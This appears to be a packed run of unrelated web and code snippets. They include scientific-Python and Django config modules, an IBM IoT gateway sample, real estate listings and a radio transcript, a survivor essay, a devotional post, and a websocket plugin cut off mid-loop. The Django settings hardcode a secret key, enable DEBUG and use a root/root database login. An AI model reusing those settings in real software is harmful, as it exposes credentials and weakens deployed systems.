Business Reviews also highlight critical performance measurements such as fill rate, backorders, and order size. These performance Reviews will enable you to monitor the service you are receiving from Big Cat Solutions and can also provide you with data to better manage your office products procurement process.
We work as consultants – using this type of information and our 30 years of experience to help your organization reduce the gross dollars spent, and help plan budgets for future procurement requirements. We work diligently as a true Business Partner because our future success is dependent on your future success. |
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
from isis_powder.hrpd_routines.hrpd_enums import HRPD_TOF_WINDOWS
absorption_correction_params = {
"cylinder_sample_height": 2.0,
"cylinder_sample_radius": 0.3,
"cylinder_position": [0., 0., 0.],
"chemical_formula": "V"
}
# Default cropping values are 5% off each end
window_10_50_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_10_110_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_30_130_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_100_200_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_180_280_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
file_names = {
"vanadium_peaks_masking_file": "VanaPeaks.dat",
"grouping_file_name": "hrpd_new_072_01_corr.cal",
"nxs_filename": "{instlow}{runno}{_fileext}{suffix}.nxs",
"gss_filename": "{instlow}{runno}{_fileext}{suffix}.gss",
"dat_files_directory": "dat_files",
"tof_xye_filename": "{instlow}{runno}{_fileext}{suffix}_b{{bankno}}_TOF.dat",
"dspacing_xye_filename": "{instlow}{runno}{_fileext}{suffix}_b{{bankno}}_D.dat",
}
general_params = {
"spline_coefficient": 70,
"focused_bin_widths": [
-0.0003, # Bank 1
-0.0007, # Bank 2
-0.0012 # Bank 3
],
"mode": "coupled"
}
def get_all_adv_variables(tof_window=HRPD_TOF_WINDOWS.window_10_110):
advanced_config_dict = {}
advanced_config_dict.update(file_names)
advanced_config_dict.update(general_params)
advanced_config_dict.update(get_tof_window_dict(tof_window=tof_window))
return advanced_config_dict
def get_tof_window_dict(tof_window):
if tof_window == HRPD_TOF_WINDOWS.window_10_50:
return window_10_50_params
if tof_window == HRPD_TOF_WINDOWS.window_10_110:
return window_10_110_params
if tof_window == HRPD_TOF_WINDOWS.window_30_130:
return window_30_130_params
if tof_window == HRPD_TOF_WINDOWS.window_100_200:
return window_100_200_params
if tof_window == HRPD_TOF_WINDOWS.window_180_280:
return window_180_280_params
raise RuntimeError("Invalid time-of-flight window: {}".format(tof_window))
|
Sir i've a plot measuring 18 X 70 feet with east facing. I'm an advocate therefore i want to built a chamber and 3 rooms with 2 toilets.
You have a specific requirement for which you should be consulting a designer for proper planning and a vastu expert (If Required).
The total area is 18x70=1260 sq.ft.
I have attached an example of the layout drawing.
As u say you have a specific requirement so you can send the details of your site on [email protected]. Then we will send the layout according your requirements . |
import os
import numpy as np
import pandas as pd
from _config import SAMPLES_DIR, DF_ONE_IDX_SEVERAL_COL, DF_ONE_IDX_SEVERAL_COL_2, \
DF_ONE_IDX_ONE_COL, DF_ONE_IDX_TWO_COL, DF_TWO_IDX_ONE_COL, DF_SCATTER, \
DF_BUBBLE, DF_HEATMAP, DF_SEVERAL_IDX_ONE_COL
def load_df(src):
_dir = os.path.dirname(__file__)
df_file = os.path.join(_dir, SAMPLES_DIR, src)
df = pd.read_csv(df_file)
return df
def df_timeseries(N=3, Nb_bd=100, seed=123456):
np.random.seed(seed)
rate = 0.02
vol = 0.25
dt = 1.0/260
tracks = np.zeros([Nb_bd, N], dtype=np.float)
for k in range(N):
ln_returns = (rate-vol**2/2)*dt+vol*np.sqrt(dt)*np.random.normal(size=Nb_bd)
ln_returns[0] = 0.0
tracks[:, k] = np.exp(ln_returns).cumprod()
dates = pd.date_range(start=pd.datetime(2015, 1, 1), periods=Nb_bd, freq='B')
df = pd.DataFrame(data=tracks, index=dates, columns=['Track'+str(1+i) for i in range(N)])
return df
def df_one_idx_several_col():
df = load_df(DF_ONE_IDX_SEVERAL_COL)
df = df.set_index('Fruit')
return df
def df_one_idx_several_col_2():
df = load_df(DF_ONE_IDX_SEVERAL_COL_2)
df = df.set_index('WeekDay')
return df
def df_one_idx_one_col():
df = load_df(DF_ONE_IDX_ONE_COL)
df = df.set_index('Brand')
return df
def df_one_idx_two_col():
df = load_df(DF_ONE_IDX_TWO_COL)
df = df.set_index('Month')
return df
def df_two_idx_one_col():
df = load_df(DF_TWO_IDX_ONE_COL)
df = df.set_index(['Brand', 'Version'])
return df
def df_scatter():
df = load_df(DF_SCATTER)
df = df.set_index(['Height', 'Weight'])
return df
def df_bubble():
df = load_df(DF_BUBBLE)
df = df.set_index(['Cat', 'x', 'y'])
return df
def df_heatmap():
df = load_df(DF_HEATMAP)
df = df.set_index(['Name', 'Day'])
return df
def df_several_idx_one_col():
df = load_df(DF_SEVERAL_IDX_ONE_COL)
df = df.set_index(['Region', 'Country', 'Cause'])
df = df.sortlevel()
return df
|
Take on Easter Solitaire anytime and enjoy the exciting game play as you seek to finish the game. Enjoy this and many more free games on 8iz.com! Play our games on any device. |
import numpy
import afnumpy
import arrayfire
from .. import private_utils as pu
from ..decorators import *
def fromstring(string, dtype=float, count=-1, sep=''):
return array(numpy.fromstring(string, dtype, count, sep))
def array(object, dtype=None, copy=True, order=None, subok=False, ndmin=0):
# We're going to ignore this for now
# if(subok is not False):
# raise NotImplementedError
if(order is not None and order is not 'K' and order is not 'C'):
raise NotImplementedError
# If it's not a numpy or afnumpy array first create a numpy array from it
if(not isinstance(object, afnumpy.ndarray) and
not isinstance(object, numpy.ndarray) and
not isinstance(object, arrayfire.array.Array)):
object = numpy.array(object, dtype=dtype, copy=copy, order=order, subok=subok, ndmin=ndmin)
if isinstance(object, arrayfire.array.Array):
shape = pu.c2f(object.dims())
else:
shape = object.shape
while(ndmin > len(shape)):
shape = (1,)+shape
if(dtype is None):
if isinstance(object, arrayfire.array.Array):
dtype = pu.typemap(object.dtype())
else:
dtype = object.dtype
if(isinstance(object, afnumpy.ndarray)):
if(copy):
s = arrayfire.cast(object.d_array.copy(), pu.typemap(dtype))
else:
s = arrayfire.cast(object.d_array, pu.typemap(dtype))
a = afnumpy.ndarray(shape, dtype=dtype, af_array=s)
a._eval()
return a
elif(isinstance(object, arrayfire.array.Array)):
if(copy):
s = arrayfire.cast(object.copy(), pu.typemap(dtype))
else:
s = arrayfire.cast(object, pu.typemap(dtype))
a = afnumpy.ndarray(shape, dtype=dtype, af_array=s)
a._eval()
return a
elif(isinstance(object, numpy.ndarray)):
return afnumpy.ndarray(shape, dtype=dtype, buffer=numpy.ascontiguousarray(object.astype(dtype, copy=copy)))
else:
raise AssertionError
def arange(start, stop = None, step = None, dtype=None):
return afnumpy.array(numpy.arange(start,stop,step,dtype))
def empty(shape, dtype=float, order='C'):
return afnumpy.ndarray(shape, dtype=dtype, order=order)
def zeros(shape, dtype=float, order='C'):
b = numpy.zeros(shape, dtype, order)
return afnumpy.ndarray(b.shape, b.dtype, buffer=b,order=order)
def where(condition, x=pu.dummy, y=pu.dummy):
a = condition
s = arrayfire.where(a.d_array)
# numpy uses int64 while arrayfire uses uint32
s = afnumpy.ndarray(pu.af_shape(s), dtype=numpy.uint32, af_array=s).astype(numpy.int64)
# Looks like where goes through the JIT??
s.eval()
if(x is pu.dummy and y is pu.dummy):
idx = []
mult = 1
for i in a.shape[::-1]:
mult = i
idx = [s % mult] + idx
s //= mult
idx = tuple(idx)
return idx
elif(x is not pu.dummy and y is not pu.dummy):
if(x.dtype != y.dtype):
raise TypeError('x and y must have same dtype')
if(x.shape != y.shape):
raise ValueError('x and y must have same shape')
ret = afnumpy.array(y)
if(len(ret.shape) > 1):
ret = ret.flatten()
ret[s] = x.flatten()[s]
ret = ret.reshape(x.shape)
else:
ret[s] = x[s]
return ret;
else:
raise ValueError('either both or neither of x and y should be given')
def concatenate(arrays, axis=0):
arrays = tuple(arrays)
if len(arrays) == 0:
raise ValueError('need at least one array to concatenate')
base = arrays[0]
if len(arrays) == 1:
return base.copy()
# arrayfire accepts at most 4 arrays to concatenate at once so we'll have
# to chunk the arrays
# The first case is special as we don't want to create unnecessary copies
i = 0
a = arrays[i].d_array
if i+1 < len(arrays):
b = arrays[i+1].d_array
else:
b = None
if i+2 < len(arrays):
c = arrays[i+2].d_array
else:
c = None
if i+3 < len(arrays):
d = arrays[i+3].d_array
else:
d = None
ret = arrayfire.join(pu.c2f(arrays[0].shape, axis), a, b, c, d)
for i in range(4,len(arrays),4):
a = ret.d_array
if i < len(arrays):
b = arrays[i].d_array
else:
b = None
if i+1 < len(arrays):
c = arrays[i+1].d_array
else:
c = None
if i+2 < len(arrays):
d = arrays[i+2].d_array
else:
d = None
ret = arrayfire.join(pu.c2f(arrays[0].shape, axis), a, b, c, d)
return ret
|
In catchment for Great Berry School is this three bedroom detached family home. With an ensuite to the main bedroom and a large conservatory to the rear. The garage can be used as an office.
The property is fully central heated powered by a Bosch combi boiler, radiators in all the rooms and double glazed. The property has the benefit of an alarm system installed.
Fitted units in white high gloss with space for fridge freezer and dishwasher. The central heating is powered by a Worcester combi boiler which is wall mounted. Stainless steel one and a half sink and drainer. With a gas hob and electric oven.
Beautifully decorated in modern colours and a large room with plenty of space for furniture. There is an ornate bay window to the front and a gas fire with surround along with two radiators.
Lantern style with plenty of windows allowing plenty of light overlooking the rear garden. French doors leading to the rear garden.
Convenient room with plumbing for washing machine and tumble dryer. Further storage.
Bath with shower over, W.C and wash hand basin.
The garage can be used for an office and has parking in front for two cars. |
# *****************************************************************************
# Copyright (c) 2016 IBM Corporation and other Contributors.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Amit M Mangalvedkar - Initial Contribution
# *****************************************************************************
import getopt
import time
import sys
import psutil
import platform
import json
import signal
import subprocess
from uuid import getnode as get_mac
try:
import ibmiotf.gateway
except ImportError:
# This part is only required to run the sample from within the samples
# directory when the module itself is not installed.
#
# If you have the module installed, just use "import ibmiotf"
import os
import inspect
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../../src")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import ibmiotf.gateway
def interruptHandler(signal, frame):
client.disconnect()
sys.exit(0)
def commandProcessor(cmd):
print("Command received: %s" % cmd.data)
if __name__ == "__main__":
signal.signal(signal.SIGINT, interruptHandler)
organization = "org_id"
gatewayType = "MY GATEWAY TYPE"
gatewayId = "MY GATEWAY ID"
gatewayName = platform.node()
authMethod = "token"
authToken = "MASKED PASSWORD"
configFilePath = None
# Seconds to sleep so as to check the error state
interval = 20
client = None
simpleGatewayInfo = ibmiotf.gateway.DeviceInfo()
simpleGatewayInfo.description = gatewayName
simpleGatewayInfo.deviceClass = platform.machine()
simpleGatewayInfo.manufacturer = platform.system()
simpleGatewayInfo.fwVersion = platform.version()
simpleGatewayInfo.hwVersion = None
simpleGatewayInfo.model = None
simpleGatewayInfo.serialNumber = None
options = {"org": organization, "type": gatewayType, "id": gatewayId, "auth-method": authMethod, "auth-token": authToken}
try:
#By default the client is an unmanaged client and on disconnecting it again becomes unmanaged
#Thats why we need to make it a managed gateway
client = ibmiotf.gateway.ManagedGateway(options, logHandlers=None, deviceInfo=simpleGatewayInfo)
client.commandCallback = commandProcessor
client.connect()
# manage() method sends request to DM server to make the device a managed device
client.manage(3600, supportDeviceActions=True, supportFirmwareActions=True).wait()
except ibmiotf.ConfigurationException as e:
print(str(e))
sys.exit()
except ibmiotf.UnsupportedAuthenticationMethod as e:
print(str(e))
sys.exit()
except ibmiotf.ConnectionException as e:
print(str(e))
sys.exit()
# Initiate DM action to update the geo location of the device, but don't wait (async) for it to complete
client.setLocation(longitude=85, latitude=85, accuracy=100)
print("Location has been set")
# Make a GET call to https://orgid.internetofthings.ibmcloud.com/api/v0002/device/types/{gateway type}/devices/{gateway id}/location to test
# Initiate DM action to set error codes to 1, wait for it to be completed (sync) and then clear all error codes
client.setErrorCode(1).wait(10)
print("Error code setting returned back")
time.sleep(interval)
client.clearErrorCodes()
client.disconnect()
print("(Press Ctrl+C to disconnect)")
|
It happens time and time again, a voice echoes loudly within our heads reminding us we are not like you and the outside world views us as different or difficult. There is no one course of action that a survivor “should take” or a specific way that a survivor “should act” during the recovery process. There are, however, some important things to keep in mind when offering support to a brain aneurysm/avm survivor.
1. THE RECOVERY PROCESS NEVER ENDS.
There will never come a time when I forget that an aneurysm entered my life. Telling me to “move on” or “get over it” never makes me want to embrace myself or the brain aneurysm. Recovery is a slow process and there are no vacations while I try to learn to navigate through this new life I’ve been given. I understand my aneurysm didn’t happen to be a death sentence, but instead that it has become a life sentence. The healing process will never end and it takes a long time before both the heart and mind are on the same track. Moving from healthy person to survivor has been a life changing process, it has transformed how I view and accept the world. It scratched my lens of perception, landing me into a deeper sense of living.
2. SURVIVORS SHARE AN UNSPEAKABLE BOND.
In my 12 years of navigating the world as a brain aneurysm survivor, I am continually struck by the power of the bond between survivors. Our condition connects us and we become friends in mere seconds, even if we’ve never met before. No matter who we are, or how different we are, there is no greater bond than the connection between survivors. It’s a recovery journey for an entire lifetime, and unfortunately only those who have walked our path understand the depth of our pain and pride we carry at the same time. Being a survivor means I’m part of a club that I can never leave, one that is full of the most caring souls I’ve ever known.
3. I WILL BE A SURVIVOR FOR THE REST OF MY LIFE.
Period. The end. There is no “moving on,” or “getting over it.” I wish people could understand the day my rupture occurred was the day I started fighting for my life. My aneurysm was not a one time event….it was an event that will last a lifetime. I’ve become a member of the club called “brain aneurysm/avm survivors” and it’s a club I didn’t apply to join… nor one I can ever leave. Every single member wishes we’d met some other way, any other but this. The members are the most beautiful, caring, loving, compassionate people I’ve ever known. They are the ones changing the way the public views brain surgery and putting an exclamation point at the end of our awareness campaign.
4. NO MATTER HOW LONG IT’S BEEN, I STILL DESIRE MY OLD SELF BACK. I WILL GRIEVE A LIFETIME FOR HER.
There are great days and then there are the not so good days. Compassion, love, and understanding are what’s needed- not advice or a lecture on how I was so lucky to have survived. I miss the prior me and I realize there is no going back. There will never come a time when I won’t think about what I would be if the brain aneurysm hadn’t entered my life. It took me a long to build that girl before the rupture and it may take me a lifetime to let her go. The length of grieving time over prior self is different for each of the club members, but every person will face a life changing moment when they realize they can’t continue down the pathway of “prior self” and must take that fork in the road towards rebuilding.
5. THE CAUSE NEVER BECOMES LONELY.
Every day another person joins our club. Every day another survivor gets upset about how our cause is not known. They are the ones who spearhead awareness campaigns or launch a crusade of involvement. They do this in the hopes of saving another person from ever having to join our club. Curious to who the movers and shakers are in this cause? Look for the survivors who are turning their tragedy into a triumph. They’ve transformed their pain into a force to make a difference. They are the ones who have figured out that if they stop crying, they can be strong and create a movement.
6. BECAUSE I KNOW DEEP PAIN, I ALSO KNOW UNSPEAKABLE JOY.
Even though I may be in recovery for a lifetime, grieving my prior self doesn’t mean my life is void of happiness, love, and enjoyment. I don’t have to choose between grieving my prior self or happiness. In this situation, grieving and happiness can cohabitate. My life is more enriched now that I have experienced a brain aneurysm. I now think from a deeper place and love from a fuller heart. Due to the fact that I’ve experienced pain, sorrow, and fear my joy comes from a place of pureness and what is essential to live for. |
"""
Django settings for project ers_backend.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
PROJECT_PATH = os.path.abspath(os.path.dirname(__name__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ul2)0@*k-3snu(fijr8)9t1ozwuk3&4wmp_l=uikt426boodl@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# REST API
'rest_framework',
'rest_framework_swagger',
'corsheaders',
# Tests
'testing',
'model_mommy',
# Websockets
'swampdragon',
# Help
'annoying',
# Apps
'dataset_manager',
'video_processor',
'arousal_modeler',
'timeframe_annotator',
'emotion_annotator'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ers_backend.urls'
WSGI_APPLICATION = 'ers_backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'()': 'djangocolors_formatter.DjangoColorsFormatter',
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'()': 'djangocolors_formatter.DjangoColorsFormatter',
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
}
},
'loggers': {
'dataset_manager': {
'handlers': ['console'],
'propagate': False,
'level': 'DEBUG',
},
'video_processor': {
'handlers': ['console'],
'propagate': False,
'level': 'DEBUG',
},
'ers_backend': {
'handlers': ['console'],
'propagate': False,
'level': 'DEBUG',
}
}
}
# REST
CORS_ORIGIN_WHITELIST = (
'http://localhost:3333'
)
CORS_ALLOW_HEADERS = (
'x-requested-with',
'content-type',
'accept',
'origin',
'authorization',
'X-CSRFToken'
)
CORS_ALLOW_CREDENTIALS = True
REST_FRAMEWORK = {
'UNICODE_JSON': False,
}
# Swampdragon
SWAMP_DRAGON_CONNECTION = ('swampdragon.connections.sockjs_connection.DjangoSubscriberConnection', '/data')
DRAGON_URL = 'http://localhost:9999/'
# Celery
USE_CELERY = True
BROKER_URL = 'redis://localhost:6379/1'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'ers_backend_db',
'USER': 'root',
'PASSWORD': 'root',
'HOST': '', # If mamp under OS X: /Applications/MAMP/tmp/mysql/mysql.sock
'PORT': '',
}
}
# Modify PATH if under OS X to have access to libraries such as ffmpeg
#os.environ["PATH"] += os.pathsep + os.pathsep.join(["/opt/local/bin", "/usr/local/bin"])
# Constants
VIDEO_EXTENSIONS = ("avi", "mkv", "mov", "mp4", "m4v", "mpeg", "mpg", "wmv")
DATASET_DEFAULT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'datasets'))
WEBCLIENT_VIDEOS_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'ers_frontend/_public/datasets/$datasetId$/videos'))
|
The latest real estate radio show talking about the Santa Clarita real estate market this week – February 4th, 2019. Enjoy the show and I have placed the ‘rough’ transcription below.
REMAX gateway: 00:00 Good everybody. Let’s get into the local real estate market here in just a moment. We’ll talk about what’s going on, the happenings and what you should be looking for if you’re considering buying or selling here as we get into the week of February, fourth, 2019. I’m your host, Conor MacIvor, Connor with honor local real estate agent headquartered here in the Santa Clarita Valley, serving greater Los Angeles cities. We do have access points for all of the multiple listing services here in southern California, and that’s going to be SCVnest.com. So if you are searching online for homes and real estate, make sure that you check out our site and I will tell you it took a lot to get it up and running just for the simple reason. Unlike Zillow and Trulia, I’m the real thing. I am a real live realtor and I have. There’s a checks and balances. There are rules and regulations for me to publicize the real listings.
REMAX gateway: 00:59 They have a workaround method sometimes. I know we get a lot of calls from clients. How about this property have at that property and I have to tell him the other day that probably is not even for sale, but I found it on Zillow. I said, I know. I know you did, but it’s not for sale. It just looks like it is. Lots of that going on. You want to escape all that and just look at real stuff. ScvNest Dot Com. Besides, I don’t want to sell your stuff. I want to be your realtor. I want to be your go-to agent, so if you do go to Scvnest.com. Do some searching. Eventually it’s going to ask you to save your listings and set you up on a search by of course, your parameters before you can proceed. The person that sees your personal information is me.
remax gateway: 01:48 That’s it. I don’t trade it. I don’t sell it, I don’t send it. I don’t compromise it in any way. It stays within my SSL encrypted database. That’s it. So when you’re ready, then you say, hey Connor, I’m all set. Let’s give it a start and the start will be, we’ll do the crash course on real estate. I’ll explain to you how it all works, whether you’re buying or selling, even if you’ve done it before, how the market’s changed, and then we’ll get into the rest of the people in those questions that you should be asking those people, those service providers regarding real estate and what they’re going to do for you to make sure that you’re well covered and those questions are going to also involve asking for the best deal you could possibly get. Why not? You should get that deal. In fact, anybody you go to that’s a professional service provider should always do their best service and handle you with the utmost care.
remax gateway: 02:52 The most important thing for me is that my clients, my real estate clients are protected and served very well throughout the entire process before months, years, maybe before, during, and of course after. So when that first point of contact comes. Alright, so let’s get into the listings. This last week here in Santa Clarita Valley, including the cities of Castaic. canyon country Newhall, Saugus Stevenson ranch and Valencia act an awkward, I’ll say in the mix as well. Seventy one new listings hit the market. Fifty nine properties had their prices changed. We see that as an upward trend from only a couple of weeks ago where those price changes weren’t much, but also we were right in the middle of the holidays at that point. I’m sorry, a month and a couple of weeks ago, so six weeks ago or so back on market properties 18. These are properties that were in escrow and fell out.
remax gateway: 03:43 Now they’re back on the market. That’s why that’s a big reason why it’s so important to set yourself up with a search account at Scvnest.com. You’re searching for homes. You find a neighborhood that you just love and you have that search set up for that particular neighborhood. Then all of a sudden you see that property that you originally got in there, you see it’s an escrow. Well, maybe you miss it. Maybe you’re too busy. Maybe a lot of stuff going on. If you were to have that search set up, when that property goes back on the market or even as its prices changed, its price changed, you’re going to get that notification in your email right away and then you’ll know you reach out to Connor what’s going on and this one, it looks like it’s back, and I said yes back. It’s falling out of escrow.
remax gateway: 07:40 show expired. Once it shows expired at the end of that contract date, then that particular seller is going to get bombarded by agents that are paying these systems to scrub or scour the Internet to get their personal information. Now they’re not going to be pulling up a phone number off of the confidential place in the MLS or wherever from the agent, but they will see that this individual left their phone number somewhere or they trace it back and they get it and they ended up calling that owner and say, and this is all scripted stuff, right? They have these scripts out there for real estate agents. Are you ready to hire the right agent? Well, in some cases they already had the right agent. Maybe they were a little unrealistic. Other price. Maybe they have a particular strategy where they’re not in a hurry. Maybe they’re waiting until the market turns.
remax gateway: 08:35 Who knows what it may be, but it could be that that agent is there, bee’s knees, but those properties that there that’s, there’s just take longer to sell. I was showing the property and property in Bakersfield yesterday, Superbowl Sunday, and while I was out there is five acres flat right next to the main road to Alfalfa fields, a massive, a garage-type improvement, super high ceilings, all insulated to massive swamp coolers on it to conex boxes sticking out of either side in the bag, made access from the inside to the out. You could park several rvs inside them, a massive roll up door. They have three of those. Then the house itself, just gorgeous, custom built, single story home with everything you could imagine. Really, really pretty, very well done. Four bedroom, four bath. Master shower was remarkable, so you have this home, but at three quarters of a million dollars, a little bit more, seven nineties at that price, in that in the middle of nowhere, it’s not around any other homes.
remax gateway: 09:55 Those questions come up so that property is going to take awhile. It’s to take a while to sell. It’s been on the market honored 80 ish days. It’s probably going to take a little bit longer, but ultimately you price something like that for a bucket is going to sell in a minute, right? Of course, the seller wouldn’t be able to sell it for a dollar and they wouldn’t want to anyway, but the end of the day it comes down to price or waiting long enough until that right buyer comes along because those buyers don’t come along as frequently as a buyer that wants to buy in an urban type area. I eat close to the mall, close to shopping, close to entertainment centers, restaurants, that sort of thing. That’s a word about expired. Those hold properties that are out there, those 18, those are typically properties that, uh, there’s something going on with maybe the seller has changed their mind and now the agent has to work it out.
remax gateway: 10:46 Maybe they have way too many offers to work on and they chose that status, which really isn’t the way it’s supposed to be. But sometimes this happens. I’ve caught in a over. Let’s get into all of the senate creative valley, 567 listings currently on the market. That data is being pulled from STV nest.com. Don’t forget to go there and click on the top. We also put in a new option for you at the top. Click on video or also you can scroll down and see my video. We had this published up here a few days ago. It kind of gives you a little bit of insight into who I am and what I’m about. Moving into the a blog section, we have several pending articles that I’ve been working on. The last one that we put up had to do with who do you trust and I have a client of ours that we wrote an offer on a house.
remax gateway: 11:41 I’ve been cast stack and she called me a little panicked saying that her sister told her that you don’t own the land under this particular house, which is totally false. We also had another relative call us, call me and tell me that his daughter is offering too much. Well, other people are offering more so that’s where that went ended up and there’s been a couple of properties lost as a result, but that’s fine. I’m here to serve no matter how long it takes, but who you trust and real estate’s incredibly important and you want to make sure that you’re getting the best advice and people aren’t taking advantage of you. I’m confident. That’s the real estate market as far as it is now. We are kind of in a little bit of a holding pattern between a buyer’s and the seller’s market.
remax gateway: 12:36 We’re not seeing a lot of inventory come on the market and we’re not seeing a lot of inventory sell, but we are seeing in some circumstances that properties are getting multiple offers when they’re priced a little bit lower than market and they’re very highly desired real estate listings. I’m Connor with HONOR. Have a great, fantastic day. I will talk to you soon. Please share the show housing radio.com. That’s an easy way to get to a sub nest. I’ve come forward slash radio. You’ll see it there. Be Safe and we’ll talk to you soon. When you’re ready, reach out because I’m here for you.
When you are ready I will be here for you and yours. I’m Connor T. MacIvor, and I’m glad to be at your service. |
# -*- coding: utf-8 -*-
from openfisca_tunisia_pension.model.base import *
# raic -> raci
# Socio-economic data
# Donnée d'entrée de la simulation à fournir à partir d'une enquète ou
# à générer avec un générateur de cas type
class date_naissance(Variable):
value_type = date
default_value = date(1970, 1, 1)
entity = Individu
label = u"Date de naissance"
definition_period = ETERNITY
class salaire(Variable):
value_type = float
entity = Individu
label = u"Salaires"
definition_period = YEAR
class age(Variable):
value_type = int
entity = Individu
label = u"Âge"
definition_period = YEAR
class trimestres_valides(Variable):
value_type = int
entity = Individu
label = u"Nombre de trimestres validés"
definition_period = YEAR
class TypesRegimeSecuriteSociale(Enum):
__order__ = 'rsna rsa rsaa rtns rtte re rtfr raci salarie_cnrps pensionne_cnrps'
# Needed to preserve the enum order in Python 2
rsna = u"Régime des Salariés Non Agricoles"
rsa = u"Régime des Salariés Agricoles"
rsaa = u"Régime des Salariés Agricoles Amélioré"
rtns = u"Régime des Travailleurs Non Salariés (secteurs agricole et non agricole)"
rtte = u"Régime des Travailleurs Tunisiens à l'Etranger"
re = u"Régime des Etudiants, diplômés de l'enseignement supérieur et stagiaires"
rtfr = u"Régime des Travailleurs à Faibles Revenus (gens de maisons, travailleurs de chantiers, et artisans travaillant à la pièce)"
raci = u"Régime des Artistes, Créateurs et Intellectuels"
salarie_cnrps = u"Régime des salariés affilés à la Caisse Nationale de Retraite et de Prévoyance Sociale"
pensionne_cnrps = u"Régime des salariés des pensionnés de la Caisse Nationale de Retraite et de Prévoyance Sociale"
# references :
# http://www.social.gov.tn/index.php?id=49&L=0
# http://www.paie-tunisie.com/412/fr/83/reglementations/regimes-de-securite-sociale.aspx
class regime_securite_sociale(Variable):
value_type = Enum
possible_values = TypesRegimeSecuriteSociale
default_value = TypesRegimeSecuriteSociale.rsna
entity = Individu
label = u"Régime de sécurité sociale du retraité"
definition_period = YEAR
|
But today, that amber glow reminded me…there is always a blessing in every season. That simple beauty was not there in the summer days. It is unique to fall.
Just like the seasons of our lives. They come and go…we yearn for the last season at times, or we yearn for a new one…yet, we forget that right there in that season, is beauty. Each season has its own beauty and its own purpose. Perfectly orchestrated by God. Each season holds its own plan.
I remember the season of being newly married. I yearned for a baby, and quickly I was in the next season. Then all of a sudden there were several babies, and here I was with a few little ones scampering around, wondering if I would ever get a minute to myself? If my house would ever be clean again?
Soon, I’ll be entering the teenage season..and rather than yearn for a different season, I will bask in the amber glow of this one. The beauty that is unique to this season of life.
I will be content in whatever seasons I am in. As I myself grow older, and I look ahead, I will always promise myself to be content whatever season I am in.
God made the seasons. They are purposeful, and each one full of beauty and uniqueness. Whether it is the Springtime bursting with life, the leaves of fall withering, or the snow covered ground, there is purpose.
Whatever season of life or motherhood you are in…bask in it. Cherish it. Grow in it. See the blessings. Be grateful for the season. |
# Plugin that creates a websocket server, and feeds all the messages written to the connected clients
import includes.helpers as helpers
import socket
import re
import base64
import hashlib
import struct
import threading
import select
import logging
class wsserver(helpers.Plugin):
def __init__(self, parent):
super().__init__(parent)
self.server = WsServerThread(4446)
self.server.start()
def handle_pm(self, msg_data):
pass
def handle_message(self, msg_data):
self.server.send_msg_all(msg_data["nick"] + ":" + msg_data["message"]) # send msg and nick to listening sockets
class WsServerThread(threading.Thread):
def __init__(self, port):
# Make server (non-blocking socket)
self.sserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sserver.setblocking(0)
self.sserver.bind(("", port))
self.sserver.listen(5)
self.client_list = []
threading.Thread.__init__(self)
def send_msg_all(self, msg):
for sock in self.client_list:
self.send_msg(sock, msg)
def run(self):
while 1:
# We wait until we got something that is ready to read
ready_to_read, ready_to_write, in_error = select.select([self.sserver] + self.client_list, [],
[self.sserver] + self.client_list, 60)
